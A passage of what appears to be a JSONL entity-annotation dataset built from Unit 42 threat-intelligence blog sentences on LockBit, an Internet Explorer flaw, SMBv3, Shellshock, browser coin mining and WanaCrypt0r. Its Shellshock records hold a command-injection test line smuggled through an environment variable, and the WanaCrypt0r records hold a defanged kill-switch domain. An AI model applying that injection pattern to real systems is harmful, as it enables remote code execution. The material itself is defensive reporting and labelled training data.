about the Cyber Threat Alliance.","entities":[{"id":47933,"label":"identity","start_offset":21,"end_offset":42}],"relations":[],"Comments":[]} {"id":2699,"text":" In August 2021, a Russian blogger published a 22-minute interview with an alleged representative of the group behind LockBit 2.0 called “LockBitSupp” on a YouTube channel called “Russian-language open source intelligence (OSINT).”","entities":[{"id":47935,"label":"location","start_offset":18,"end_offset":26},{"id":47934,"label":"TIME","start_offset":4,"end_offset":15},{"id":47936,"label":"threat-actor","start_offset":118,"end_offset":129},{"id":47937,"label":"SOFTWARE","start_offset":156,"end_offset":163}],"relations":[],"Comments":[]} {"id":2700,"text":"The same Russian blogger previously published interviews with a representative of the group behind the REvil ransomware-as-a-service (RaaS), hackers and security experts.","entities":[{"id":47938,"label":"threat-actor","start_offset":103,"end_offset":108}],"relations":[],"Comments":[]} {"id":2701,"text":" Some key takeaways from the claims made in the interview were: LockBit 3.0: Another Upgrade to the World’s Most Active Ransomware Ransomware Groups to Watch: Emerging Threats Average Ransom Payment Up 71% This Year, Approaches $1 Million 2022 Unit 42 Ransomware Threat Report Highlights Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[{"id":47939,"label":"threat-actor","start_offset":64,"end_offset":75},{"id":47940,"label":"identity","start_offset":244,"end_offset":251}],"relations":[],"Comments":[]} {"id":2702,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":2703,"text":" By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} {"id":2704,"text":"On Saturday, Microsoft disclosed a critical vulnerability in Internet Explorer, CVE-2014-1776, affecting Internet Explorer versions 6 through 11.","entities":[{"id":47941,"label":"TIME","start_offset":3,"end_offset":11},{"id":47942,"label":"identity","start_offset":13,"end_offset":22},{"id":47944,"label":"vulnerability","start_offset":80,"end_offset":93},{"id":47945,"label":"SOFTWARE","start_offset":105,"end_offset":133},{"id":47943,"label":"SOFTWARE","start_offset":61,"end_offset":78}],"relations":[{"id":368,"from_id":47944,"to_id":47945,"type":"has"}],"Comments":[]} {"id":2705,"text":"The vulnerability exists in the way that Internet Explorer accesses an object in memory that has been deleted or has not been properly allocated.","entities":[{"id":47946,"label":"SOFTWARE","start_offset":41,"end_offset":58}],"relations":[],"Comments":[]} {"id":2706,"text":"The vulnerability allows an attacker to execute arbitrary code in the context of the current user within Internet Explorer.","entities":[{"id":47947,"label":"attack-pattern","start_offset":40,"end_offset":62},{"id":45668,"label":"SOFTWARE","start_offset":105,"end_offset":122}],"relations":[],"Comments":[]} {"id":2707,"text":"This could be exploited with drive-by downloads or watering-hole attacks, and has been observed being used in attacks in the wild.","entities":[{"id":47948,"label":"attack-pattern","start_offset":51,"end_offset":72},{"id":47949,"label":"attack-pattern","start_offset":29,"end_offset":47}],"relations":[],"Comments":[]} {"id":2708,"text":" The exploit code used in these attacks only targets IE versions 9, 10 and 11, but earlier versions are still vulnerable.","entities":[{"id":47950,"label":"SOFTWARE","start_offset":53,"end_offset":77}],"relations":[],"Comments":[]} {"id":2709,"text":"As of this writing, Microsoft has not stated when a patch for the vulnerability will be available, but in its advisory the company provided multiple work-arounds.","entities":[{"id":45669,"label":"identity","start_offset":20,"end_offset":29}],"relations":[],"Comments":[]} {"id":2710,"text":"Additionally, Windows XP systems running IE 6, 7 and 8 are also vulnerable, but will not receive a patch, as Microsoft no longer supports them.","entities":[{"id":47953,"label":"identity","start_offset":109,"end_offset":118},{"id":47951,"label":"SOFTWARE","start_offset":14,"end_offset":24},{"id":47952,"label":"SOFTWARE","start_offset":41,"end_offset":54}],"relations":[],"Comments":[]} {"id":2711,"text":" It is always important to view this type of critical vulnerability in the larger context of the threat landscape.","entities":[],"relations":[],"Comments":[]} {"id":2712,"text":"Attackers identify thousands of critical vulnerabilities in commonly used software each year, such as Internet Explorer.","entities":[{"id":45670,"label":"SOFTWARE","start_offset":102,"end_offset":119}],"relations":[],"Comments":[]} {"id":2713,"text":"Once identified, they then craft a seemingly endless supply of exploits that leverage these vulnerabilities to deliver unknown malware and compromise networks and endpoints.","entities":[],"relations":[],"Comments":[]} {"id":2714,"text":"Palo Alto Networks enterprise security platform is focused on providing an integrated approach to detecting and preventing advanced threats across each step in the attack kill-chain.","entities":[{"id":47954,"label":"identity","start_offset":0,"end_offset":18}],"relations":[],"Comments":[]} {"id":2715,"text":"Bringing together our next-generation firewall – again a Gartner Magic Quadrant Leader – Threat Prevention, URL Filtering, WildFire, and Cyvera’s ability to prevent exploitation of unknown vulnerabilities will allow us to continue offering ground-breaking protection for our customers’ networks and endpoints, including Windows XP clients.","entities":[{"id":45672,"label":"SOFTWARE","start_offset":137,"end_offset":143},{"id":45671,"label":"SOFTWARE","start_offset":123,"end_offset":131},{"id":45673,"label":"SOFTWARE","start_offset":320,"end_offset":330}],"relations":[],"Comments":[]} {"id":2716,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":2717,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":2718,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":2719,"text":"This post is also available in: 日本語 (Japanese) In March 2020 Microsoft released a security advisory, ADV200005 | Microsoft Guidance for Disabling SMBv3 Compression, for a new remote code execution (RCE) vulnerability.","entities":[{"id":47955,"label":"TIME","start_offset":56,"end_offset":66},{"id":47956,"label":"identity","start_offset":67,"end_offset":76},{"id":47958,"label":"SOFTWARE","start_offset":152,"end_offset":157},{"id":47960,"label":"attack-pattern","start_offset":181,"end_offset":208},{"id":47957,"label":"identity","start_offset":119,"end_offset":128}],"relations":[],"Comments":[]} {"id":2720,"text":"Shortly after this advisory was released, Microsoft issued an out-of-band patch to protect affected users from CVE-2020-0796.","entities":[{"id":47962,"label":"vulnerability","start_offset":111,"end_offset":124},{"id":47961,"label":"identity","start_offset":42,"end_offset":51}],"relations":[],"Comments":[]} {"id":2721,"text":" An out-of-band patch is typically released outside of the expected update period for a vendor.","entities":[],"relations":[],"Comments":[]} {"id":2722,"text":" In this particular case, Microsoft is known to release updates on Patch Tuesday, which was two days prior to this out-of-band update.","entities":[{"id":47963,"label":"SOFTWARE","start_offset":26,"end_offset":35}],"relations":[],"Comments":[]} {"id":2723,"text":" This vulnerability exists within the Microsoft Server Message Block 3.0 (SMBv3), specifically regarding malformed compression headers.","entities":[{"id":47964,"label":"SOFTWARE","start_offset":39,"end_offset":81}],"relations":[],"Comments":[]} {"id":2724,"text":"Compression headers are a feature that was added to SMBv3 negotiate context request packets in May 2019.","entities":[{"id":45675,"label":"TIME","start_offset":95,"end_offset":103},{"id":45674,"label":"SOFTWARE","start_offset":52,"end_offset":57}],"relations":[],"Comments":[]} {"id":2725,"text":"For successful unauthenticated exploitation an attacker would need to craft a SMBv3 packet that contains the malformed compression header to a vulnerable SMBv3 Server.","entities":[{"id":47967,"label":"attack-pattern","start_offset":15,"end_offset":43},{"id":47965,"label":"SOFTWARE","start_offset":154,"end_offset":166},{"id":47966,"label":"SOFTWARE","start_offset":78,"end_offset":83}],"relations":[],"Comments":[]} {"id":2726,"text":" For SMBv3 clients would require enticing a user to connect to a compromised SMBv3 server that they control.","entities":[{"id":47968,"label":"SOFTWARE","start_offset":5,"end_offset":10},{"id":47969,"label":"SOFTWARE","start_offset":77,"end_offset":82}],"relations":[],"Comments":[]} {"id":2727,"text":"At the time of release, Microsoft affirmed that they had not yet seen the vulnerability exploited in the wild (ITW).","entities":[{"id":45676,"label":"identity","start_offset":24,"end_offset":33}],"relations":[],"Comments":[]} {"id":2728,"text":" This vulnerability only affects SMBv3 and the following builds of the Microsoft Windows operating system (OS): Review the workaround guidance provided by the Microsoft Security Vulnerability.","entities":[{"id":47970,"label":"SOFTWARE","start_offset":33,"end_offset":38},{"id":47971,"label":"SOFTWARE","start_offset":71,"end_offset":110},{"id":47972,"label":"identity","start_offset":160,"end_offset":192}],"relations":[],"Comments":[]} {"id":2729,"text":"As always, we recommend our customers patch their systems as soon as possible.","entities":[],"relations":[],"Comments":[]} {"id":2730,"text":"Upgrade Cortex XDR and Traps agents for protection against this vulnerability regardless of whether your systems have installed the relevant security update from Microsoft.","entities":[{"id":45677,"label":"SOFTWARE","start_offset":8,"end_offset":18},{"id":45678,"label":"identity","start_offset":162,"end_offset":171}],"relations":[],"Comments":[]} {"id":2731,"text":"For client mitigation, recommend creating an outbound firewall rule to block SMB outbound on public and private interfaces.","entities":[{"id":47973,"label":"SOFTWARE","start_offset":77,"end_offset":80}],"relations":[],"Comments":[]} {"id":2732,"text":" Palo Alto Networks Cortex XDR and Traps provide protection against this vulnerability regardless of whether they are running on an unpatched instance of Microsoft Windows 10.","entities":[{"id":47974,"label":"SOFTWARE","start_offset":158,"end_offset":178},{"id":8365,"label":"identity","start_offset":5,"end_offset":23},{"id":8366,"label":"tools","start_offset":24,"end_offset":34}],"relations":[],"Comments":[]} {"id":2733,"text":"Additionally, Palo Alto Networks offers multiple, additional complementary protections for this exploit.","entities":[{"id":45679,"label":"identity","start_offset":14,"end_offset":32}],"relations":[],"Comments":[]} {"id":2734,"text":"As a member of the Microsoft Active Protections Program (MAPP) program, Palo Alto Networks received early details of the vulnerability, providing greater understanding of the threat, which helps us implement strong product coverage.","entities":[{"id":47975,"label":"identity","start_offset":72,"end_offset":90},{"id":47976,"label":"identity","start_offset":19,"end_offset":62}],"relations":[],"Comments":[]} {"id":2735,"text":"As always, we recommend keeping your Microsoft products up to date with the latest patches to mitigate this vulnerability.","entities":[{"id":47977,"label":"identity","start_offset":37,"end_offset":46}],"relations":[],"Comments":[]} {"id":2736,"text":" Palo Alto Networks will update this Threat Brief with new information and recommendations as they become available.","entities":[{"id":45680,"label":"identity","start_offset":1,"end_offset":19}],"relations":[],"Comments":[]} {"id":2737,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":2738,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":2739,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":2740,"text":"This post is also available in: 日本語 (Japanese) Around 6:00 am PST on September 24, the details of a vulnerability in the widely used Bourne Again Shell (Bash) were disclosed by multiple Linux vendors.","entities":[{"id":47978,"label":"TIME","start_offset":60,"end_offset":87},{"id":47979,"label":"SOFTWARE","start_offset":192,"end_offset":197},{"id":47980,"label":"SOFTWARE","start_offset":139,"end_offset":164}],"relations":[],"Comments":[]} {"id":2741,"text":"The vulnerability, assigned CVE-2014-6271 by Mitre, was originally discovered by Stephane Chazelas, a Unix and Linux network and telecom administrator and IT manager at UK robotics company SeeByte, Ltd. ","entities":[{"id":47982,"label":"identity","start_offset":45,"end_offset":50},{"id":47984,"label":"SOFTWARE","start_offset":102,"end_offset":106},{"id":47981,"label":"vulnerability","start_offset":28,"end_offset":41},{"id":47983,"label":"identity","start_offset":81,"end_offset":98},{"id":47986,"label":"identity","start_offset":169,"end_offset":201},{"id":47985,"label":"SOFTWARE","start_offset":111,"end_offset":116}],"relations":[],"Comments":[]} {"id":2742,"text":"While this vulnerability didn’t come with quite the fanfare or a catchy name like Heartbleed, the security community quickly dubbed it “Shellshock.”","entities":[{"id":45681,"label":"vulnerability","start_offset":82,"end_offset":92},{"id":45682,"label":"vulnerability","start_offset":136,"end_offset":146}],"relations":[],"Comments":[]} {"id":2743,"text":"Bash is present in most Linux and Unix distributions as well as Apple’s Mac OS X, and there’s a good chance anyone reading this has a system they need to patch.","entities":[{"id":47988,"label":"SOFTWARE","start_offset":34,"end_offset":38},{"id":47987,"label":"SOFTWARE","start_offset":24,"end_offset":29},{"id":47989,"label":"SOFTWARE","start_offset":64,"end_offset":80}],"relations":[],"Comments":[]} {"id":2744,"text":" Palo Alto Networks initiated an emergency IPS content release to detect this vulnerability last night with Signature ID: 36729 \"Bash Remote Code Execution Vulnerability.” ","entities":[{"id":47990,"label":"identity","start_offset":1,"end_offset":19},{"id":47991,"label":"vulnerability","start_offset":129,"end_offset":169}],"relations":[],"Comments":[]} {"id":2745,"text":"All versions of PAN-OS and Panorama include the vulnerable version of Bash, but we’ve determined the issue is only exploitable by authenticated users.","entities":[{"id":45683,"label":"SOFTWARE","start_offset":16,"end_offset":22},{"id":45684,"label":"SOFTWARE","start_offset":27,"end_offset":35},{"id":45685,"label":"SOFTWARE","start_offset":70,"end_offset":75}],"relations":[],"Comments":[]} {"id":2746,"text":"Normal PAN-OS maintenance release updates will provide a fix for the vulnerability.","entities":[{"id":47992,"label":"SOFTWARE","start_offset":7,"end_offset":13}],"relations":[],"Comments":[]} {"id":2747,"text":"We have posted the advisory on our product vulnerability page.","entities":[],"relations":[],"Comments":[]} {"id":2748,"text":"Read on for more details.","entities":[],"relations":[],"Comments":[]} {"id":2749,"text":" Vulnerability Details CVE-2014-6271 exists in all versions of Bash and is related to how environment variables are processed when the shell starts up.","entities":[{"id":47993,"label":"vulnerability","start_offset":24,"end_offset":37},{"id":47994,"label":"tools","start_offset":64,"end_offset":68}],"relations":[{"id":369,"from_id":47994,"to_id":47993,"type":"has"}],"Comments":[]} {"id":2750,"text":"Environment variables are used by shell software to store pieces of information like the location of the user’s home directory.","entities":[],"relations":[],"Comments":[]} {"id":2751,"text":"In addition to storing variables, Bash allows for storing shell functions in variables that users can call later.","entities":[{"id":45686,"label":"SOFTWARE","start_offset":34,"end_offset":38}],"relations":[],"Comments":[]} {"id":2752,"text":"It’s in parsing these functions that the new Bash vulnerability exists, as the shell mistakenly executes code that is added after a function definition.","entities":[{"id":47995,"label":"tools","start_offset":45,"end_offset":49}],"relations":[],"Comments":[]} {"id":2753,"text":"Here’s an example: $ env x='() { :;}; echo vulnerable'","entities":[],"relations":[],"Comments":[]} {"id":2754,"text":"bash -c \"echo this is a test\"","entities":[],"relations":[],"Comments":[]} {"id":2755,"text":" vulnerable this is a test ","entities":[],"relations":[],"Comments":[]} {"id":2756,"text":"Bash should stop processing the environment variable “x” after the closing semicolon for the function, but instead continues to process “echo vulnerable”.","entities":[],"relations":[],"Comments":[]} {"id":2757,"text":"At first glance, this might not seem too dangerous as executing commands is Bash’s primary function, but it’s important to understand that many other programs use Bash to process commands.","entities":[{"id":45687,"label":"SOFTWARE","start_offset":76,"end_offset":80},{"id":45688,"label":"SOFTWARE","start_offset":163,"end_offset":167}],"relations":[],"Comments":[]} {"id":2758,"text":" While these two scenarios are currently the most-likely vectors for exploiting this vulnerability, it’s likely that other services use Bash in a network-exploitable way.","entities":[],"relations":[],"Comments":[]} {"id":2759,"text":"The only way to fully prevent exploitation is to upgrade Bash on the system to a non-vulnerable version. Impact","entities":[],"relations":[],"Comments":[]} {"id":2760,"text":"The good news is that this vulnerability was disclosed responsibly and patches are available for most platforms on the day of the public disclosure.","entities":[],"relations":[],"Comments":[]} {"id":2761,"text":"The bad news is that this vulnerability is going to have a very long tail.","entities":[],"relations":[],"Comments":[]} {"id":2762,"text":"Bash is the default shell for the most-popular Linux variants and every version of the software stretching back over two decades is vulnerable.","entities":[{"id":47996,"label":"SOFTWARE","start_offset":47,"end_offset":52}],"relations":[],"Comments":[]} {"id":2763,"text":"Well-maintained systems will be patched today, but that dusty old system in the networking closet might never get the update.","entities":[],"relations":[],"Comments":[]} {"id":2764,"text":"Additionally, network devices, embedded systems and Internet-connected devices (like IP Cameras) often run Linux and could be vulnerable.","entities":[],"relations":[],"Comments":[]} {"id":2765,"text":" Fortunately, not every system is remotely exploitable simply because it’s running Bash, it also needs to be running an application which makes Bash accessible over the network.","entities":[{"id":47998,"label":"tools","start_offset":144,"end_offset":148},{"id":47997,"label":"tools","start_offset":83,"end_offset":87}],"relations":[],"Comments":[]} {"id":2766,"text":"As described above, the most-common exploit scenario seems like it will be web servers running Apache and using CGI scripts.","entities":[{"id":45689,"label":"SOFTWARE","start_offset":95,"end_offset":101},{"id":45690,"label":"SOFTWARE","start_offset":111,"end_offset":115}],"relations":[],"Comments":[]} {"id":2767,"text":"Web servers are great resources for attackers.","entities":[],"relations":[],"Comments":[]} {"id":2768,"text":"They can be used to: These are all likely outcomes from mass scanning of the Internet for vulnerable hosts, which are already underway.","entities":[],"relations":[],"Comments":[]} {"id":2769,"text":" Recommendations Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":2770,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} {"id":2771,"text":"On January 2, 2017, one Bitcoin was worth US $985.56.","entities":[{"id":47999,"label":"TIME","start_offset":3,"end_offset":18},{"id":48000,"label":"SOFTWARE","start_offset":24,"end_offset":31}],"relations":[],"Comments":[]} {"id":2772,"text":" By October 16, 2017, that same Bitcoin was worth US $ 5,707.40: a 579% increase in value in ten and a half months.","entities":[{"id":45691,"label":"TIME","start_offset":4,"end_offset":20},{"id":45692,"label":"SOFTWARE","start_offset":32,"end_offset":39}],"relations":[],"Comments":[]} {"id":2773,"text":" By comparison, Ethereum has gone from US $8.15 per ether on January 2, 2017 to US $342.83 per ether on October 16, 2017: a jump of 4,206%. Cryptocurrencies are big money these days and seemingly getting bigger by the day. And if we’ve learned one thing about cybercriminals, they follow the money.","entities":[{"id":48001,"label":"TIME","start_offset":61,"end_offset":76},{"id":48002,"label":"TIME","start_offset":104,"end_offset":120},{"id":48003,"label":"SOFTWARE","start_offset":16,"end_offset":24}],"relations":[],"Comments":[]} {"id":2774,"text":" So, it’s not surprising to see that cybercrime is turning its attention to cryptocurrencies.","entities":[],"relations":[],"Comments":[]} {"id":2775,"text":" In our latest research, “Unauthorized Coin Mining in the Browser”, Unit 42 researchers show how cybercriminals have taken an old tactic, hijacking web browsers without the users consent or knowledge (commonly called a “drive -by attack”), and adapted it to make money in the increasingly lucrative cryptocurrencies markets.","entities":[{"id":48004,"label":"attack-pattern","start_offset":26,"end_offset":50},{"id":45693,"label":"identity","start_offset":68,"end_offset":75},{"id":45694,"label":"attack-pattern","start_offset":138,"end_offset":160},{"id":45696,"label":"attack-pattern","start_offset":220,"end_offset":236}],"relations":[],"Comments":[]} {"id":2776,"text":"Before, drive-by attacks focused on abusing a browser’s legitimate download capabilities to download malware onto the victim’s system without their consent or knowledge.","entities":[{"id":48005,"label":"attack-pattern","start_offset":92,"end_offset":108}],"relations":[],"Comments":[]} {"id":2777,"text":"These new drive-by attacks focus on hijacking the computational resources of the victim’s computer to “mine” cryptocurrency on behalf of the attackers.","entities":[{"id":48006,"label":"attack-pattern","start_offset":36,"end_offset":73}],"relations":[],"Comments":[]} {"id":2778,"text":" The focus of these attacks is to use the victim’s web browser to access the computational resources of their system.","entities":[],"relations":[],"Comments":[]} {"id":2779,"text":"The attackers accomplish this through abuse of a legitimate tool by placing it on malicious or compromised websites and running it in the victim’s browser without his or her consent or knowledge when they visit the site.","entities":[],"relations":[],"Comments":[]} {"id":2780,"text":"The tool is designed to “mine” cryptocurrencies, that is it earns credit in the cryptocurrency in exchange for computing power that is used to power the cryptocurrencies’ digital infrastructure.","entities":[],"relations":[],"Comments":[]} {"id":2781,"text":"This tool has a legitimate use: sites can and do notify users that they’re using the site visitors’ resources in this way to support the site, typically as a substitute for ads on the site.","entities":[],"relations":[],"Comments":[]} {"id":2782,"text":"But in this case, the attacker actually gets the credit that the victim’s computational resources earns without the visitors’ consent or knowledge making it a malicious attack.","entities":[],"relations":[],"Comments":[]} {"id":2783,"text":" Put simply, the net result is that the victim’s computer slows down (sometimes significantly) while on the malicious or compromised website.","entities":[],"relations":[],"Comments":[]} {"id":2784,"text":"And while the computer is impacted like this, the attacker is earning money.","entities":[],"relations":[],"Comments":[]} {"id":2785,"text":"The attacker steals the victims computing resources and translates it into a cryptocurrency like Bitcoin.","entities":[{"id":48011,"label":"SOFTWARE","start_offset":97,"end_offset":104}],"relations":[],"Comments":[]} {"id":2786,"text":" This new kind of attack tells us that at least some cybercriminals are starting to view theft of victim’s computing power to translate into cryptocurrencies as a better business proposition than the traditional practice of loading malware on the victim’s system through drive-by downloads.","entities":[],"relations":[],"Comments":[]} {"id":2787,"text":" And our research shows that this isn’t an isolated event.","entities":[],"relations":[],"Comments":[]} {"id":2788,"text":"Our researchers analyzed over 1,000 of sites and what they found was very telling.","entities":[],"relations":[],"Comments":[]} {"id":2789,"text":" The good news is that these attacks are more like denial of service attacks: they don’t do lasting harm to your system and they end when you leave the site. The bad news is that these are harder to defend against than typical drive-by download attacks.","entities":[],"relations":[],"Comments":[]} {"id":2790,"text":"Where drive-by download attacks usually exploit unpatched vulnerabilities, the root of these attacks is that they abuse otherwise legitimate functionality: you can’t prevent them by being fully patched.","entities":[],"relations":[],"Comments":[]} {"id":2791,"text":" Security products that take a comprehensive, layered approach can help prevent these attacks.","entities":[],"relations":[],"Comments":[]} {"id":2792,"text":"And if you think your system is being affected by one of these attacks, you can, in most cases, end the attack by either leaving the site or closing the browser.","entities":[],"relations":[],"Comments":[]} {"id":2793,"text":"Most of all, this latest development shows how a changing economic landscape in turn changes the cybercrime landscape.","entities":[],"relations":[],"Comments":[]} {"id":2794,"text":"Loading malware through drive-by downloads is so 2012: in 2017 it’s about drive-by mining attacks to earn cryptocurrencies.","entities":[{"id":48012,"label":"TIME","start_offset":49,"end_offset":53},{"id":48013,"label":"TIME","start_offset":58,"end_offset":62}],"relations":[],"Comments":[]} {"id":2795,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":2796,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":2797,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":2798,"text":"This post is also available in: 日本語 (Japanese) This Unit 42 blog provides an update on the threat situation surrounding the WanaCrypt0r ransomware attacks and how the attack propagates.","entities":[{"id":48014,"label":"identity","start_offset":58,"end_offset":65},{"id":48015,"label":"malware","start_offset":130,"end_offset":141}],"relations":[],"Comments":[]} {"id":2799,"text":" Initial reports said that the WanaCrypt0r attack began as part of a spam\/phishing campaign.","entities":[{"id":45697,"label":"malware","start_offset":31,"end_offset":42},{"id":45698,"label":"campaign","start_offset":69,"end_offset":91}],"relations":[],"Comments":[]} {"id":2800,"text":"Unit 42 and other researchers have concluded that these reports are not substantiated.","entities":[{"id":48016,"label":"identity","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} {"id":2801,"text":"While the initial attack vector for these attacks is unknown, it is certain that the spread of the ransomware occurs through active exploitation of the ETERNALBLUE vulnerability (CVE-2017-0144) in Microsoft Windows.","entities":[{"id":48017,"label":"vulnerability","start_offset":179,"end_offset":192},{"id":48018,"label":"SOFTWARE","start_offset":197,"end_offset":214},{"id":8563,"label":"vulnerability","start_offset":152,"end_offset":163}],"relations":[{"id":371,"from_id":48018,"to_id":48017,"type":"has"},{"id":373,"from_id":8563,"to_id":48017,"type":"related-to"}],"Comments":[]} {"id":2802,"text":"Patches for this vulnerability for all supported versions of Windows have been available since March 2017.","entities":[{"id":45699,"label":"TIME","start_offset":95,"end_offset":105},{"id":45700,"label":"SOFTWARE","start_offset":61,"end_offset":68}],"relations":[],"Comments":[]} {"id":2803,"text":"On Friday May 12, 2017, Microsoft took the extraordinary step of releasing patches for out-of-support versions of Windows to help protect against these attacks.","entities":[{"id":48019,"label":"TIME","start_offset":10,"end_offset":22},{"id":48020,"label":"identity","start_offset":24,"end_offset":33},{"id":48021,"label":"SOFTWARE","start_offset":114,"end_offset":121}],"relations":[],"Comments":[]} {"id":2804,"text":" As the attack leverages this Microsoft vulnerability, the most appropriate first step to take against the attack is to apply the patches.","entities":[{"id":48022,"label":"identity","start_offset":30,"end_offset":39}],"relations":[],"Comments":[]} {"id":2805,"text":"Unit 42 researchers have confirmed that the patch is effective against the WanaCrypt0r Ransomware attacks.","entities":[{"id":45701,"label":"identity","start_offset":0,"end_offset":7},{"id":45702,"label":"malware","start_offset":75,"end_offset":86}],"relations":[],"Comments":[]} {"id":2806,"text":" In addition, Palo Alto Networks, and other vendors, including our fellow members of the Cyber Threat Alliance, have released additional protections that help prevent the spread of the WanaCrypt0r ransomware.","entities":[{"id":48025,"label":"malware","start_offset":185,"end_offset":196},{"id":48023,"label":"identity","start_offset":14,"end_offset":32},{"id":48024,"label":"identity","start_offset":89,"end_offset":110}],"relations":[],"Comments":[]} {"id":2807,"text":"For information on Palo Alto Networks protections, please see our posting Palo Alto Networks Protections Against WanaCrypt0r Ransomware Attacks.","entities":[{"id":48027,"label":"identity","start_offset":74,"end_offset":92},{"id":48026,"label":"identity","start_offset":19,"end_offset":37},{"id":8580,"label":"malware","start_offset":113,"end_offset":124}],"relations":[],"Comments":[]} {"id":2808,"text":"As with all ransomware attacks, Palo Alto Networks and Unit 42 recommends that anyone affected NOT pay the ransom.","entities":[{"id":45703,"label":"identity","start_offset":32,"end_offset":50},{"id":45704,"label":"identity","start_offset":55,"end_offset":62}],"relations":[],"Comments":[]} {"id":2809,"text":"Unit 42 is not aware of any reports where paying the ransom to the WanaCrypt0r attackers has resulted in the recovery of data.","entities":[{"id":48028,"label":"identity","start_offset":0,"end_offset":7},{"id":8587,"label":"malware","start_offset":67,"end_offset":78}],"relations":[],"Comments":[]} {"id":2810,"text":"In addition, Unit 42 research has shown that very few have attempted to pay the ransom.","entities":[{"id":48029,"label":"identity","start_offset":13,"end_offset":20}],"relations":[],"Comments":[]} {"id":2811,"text":" Unit 42 is following this situation very closely and will update this blog with any new information as it becomes available.","entities":[{"id":45705,"label":"identity","start_offset":1,"end_offset":8}],"relations":[],"Comments":[]} {"id":2812,"text":" WanaCrypt0r is a global ransomware attack that emerged on Friday, May 12, 2017.","entities":[{"id":48030,"label":"malware","start_offset":1,"end_offset":12},{"id":48031,"label":"TIME","start_offset":59,"end_offset":79}],"relations":[],"Comments":[]} {"id":2813,"text":"It immediately gained broad media attention, due to its destructive nature, how widespread it was, and multiple high profile victims.","entities":[],"relations":[],"Comments":[]} {"id":2814,"text":"This attack uses the version 2.0 of this ransomware.","entities":[],"relations":[],"Comments":[]} {"id":2815,"text":"WanaCrypt0r v 1.0 was first reported a few months ago but did not include the worm capability associated with this attack.","entities":[{"id":48032,"label":"malware","start_offset":0,"end_offset":17}],"relations":[],"Comments":[]} {"id":2816,"text":" Reports quickly emerged that this attack was effective due to the presence of code exploiting a vulnerability (CVE-2017-0144) in Microsoft Windows (code named: ETERNALBLUE) that was released as part of the Equation Group dump by the Shadow Brokers in their fifth leak on April 14, 2017.","entities":[{"id":48034,"label":"SOFTWARE","start_offset":130,"end_offset":147},{"id":48035,"label":"TIME","start_offset":272,"end_offset":286},{"id":48033,"label":"vulnerability","start_offset":112,"end_offset":125},{"id":8600,"label":"vulnerability","start_offset":161,"end_offset":172},{"id":8601,"label":"threat-actor","start_offset":207,"end_offset":221},{"id":8602,"label":"threat-actor","start_offset":230,"end_offset":248}],"relations":[{"id":377,"from_id":48034,"to_id":48033,"type":"has"},{"id":378,"from_id":8600,"to_id":48033,"type":"related-to"},{"id":379,"from_id":8600,"to_id":8601,"type":"related-to"}],"Comments":[]} {"id":2817,"text":"Microsoft patched this vulnerability as part of the March 2017 Monthly Security Update Release by Microsoft Security Bulletin MS17-010.","entities":[{"id":45706,"label":"identity","start_offset":0,"end_offset":9},{"id":45708,"label":"identity","start_offset":98,"end_offset":107},{"id":45707,"label":"TIME","start_offset":52,"end_offset":62}],"relations":[],"Comments":[]} {"id":2818,"text":"This is a SYSTEM-level remote code execution (RCE) in the handling of the Server Message Block (SMB) protocol in Microsoft Windows.","entities":[{"id":48036,"label":"attack-pattern","start_offset":23,"end_offset":50},{"id":48037,"label":"SOFTWARE","start_offset":74,"end_offset":100},{"id":48038,"label":"SOFTWARE","start_offset":113,"end_offset":130}],"relations":[],"Comments":[]} {"id":2819,"text":" The attack uses this vulnerability to spread the WanaCrypt0r ransomware on the network.","entities":[{"id":8612,"label":"malware","start_offset":50,"end_offset":61}],"relations":[],"Comments":[]} {"id":2820,"text":"This is a classic network worm-class vulnerability like MS-Blaster and Conficker.","entities":[{"id":45709,"label":"vulnerability","start_offset":56,"end_offset":66},{"id":45710,"label":"vulnerability","start_offset":71,"end_offset":80}],"relations":[],"Comments":[]} {"id":2821,"text":" Early reports indicated that the initial attack vector was via spam and\/or phishing email.","entities":[{"id":48039,"label":"attack-pattern","start_offset":64,"end_offset":90}],"relations":[],"Comments":[]} {"id":2822,"text":"However, this has not been confirmed and is unlikely to account for the global spread of the malware.","entities":[],"relations":[],"Comments":[]} {"id":2823,"text":" When the WanaCrypt0r ransomware executes successfully, it will encrypt key files on the system and display a ransom note as shown below (SOURCE: Microsoft).","entities":[{"id":45712,"label":"identity","start_offset":146,"end_offset":155},{"id":45711,"label":"malware","start_offset":10,"end_offset":21}],"relations":[],"Comments":[]} {"id":2824,"text":"Figure 1 Ransom note for WanaCrypt0r ","entities":[{"id":8627,"label":"tools","start_offset":25,"end_offset":36}],"relations":[],"Comments":[]} {"id":2825,"text":"One thing reports have indicated that make this attack unique is a “killswitch” capability built into the malware.","entities":[],"relations":[],"Comments":[]} {"id":2826,"text":"This “killswitch” will prevent the WanaCrypt0r ransomware from executing.","entities":[{"id":45713,"label":"malware","start_offset":35,"end_offset":46}],"relations":[],"Comments":[]} {"id":2827,"text":"The “killswitch” is code which will attempt to connect to an extremely long domain that should not resolve.","entities":[],"relations":[],"Comments":[]} {"id":2828,"text":"The initial variant of WanaCrypt0r uses hxxp:\/\/iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com, however, there are reports of newer variants using 